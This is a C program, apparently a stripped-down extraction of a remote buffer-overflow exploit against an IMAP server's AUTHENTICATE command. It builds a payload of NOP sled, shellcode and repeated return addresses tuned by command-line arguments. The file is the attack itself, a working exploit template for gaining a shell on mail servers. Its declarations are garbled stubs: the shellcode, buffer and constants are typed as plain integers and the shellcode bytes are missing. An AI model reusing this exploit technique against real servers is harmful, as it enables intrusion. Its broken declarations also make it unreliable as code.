
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFLEN ;
 int NOP ;
 int * buf ;
 int esp ;
 int memcpy (int *,int ,int) ;
 int memset (int *,int ,int) ;
 int nop ;
 int offset ;
 int printf (char*,...) ;
 int putchar (int ) ;
 int shell ;
 int strlen (int ) ;
 int strtol (char*,int *,int ) ;
 void* strtoul (char*,int *,int ) ;

void
main (int argc, char *argv[])
{
int i;

if (argc < 4) {
printf("usage: %s nop esp offset\n", argv[0]);
return;
}

nop = strtoul(argv[1], ((void*)0), 0);
esp = strtoul(argv[2], ((void*)0), 0);
offset = strtol(argv[3], ((void*)0), 0);

memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
*((int *) &buf[i]) = esp + offset;

printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");

return;
}
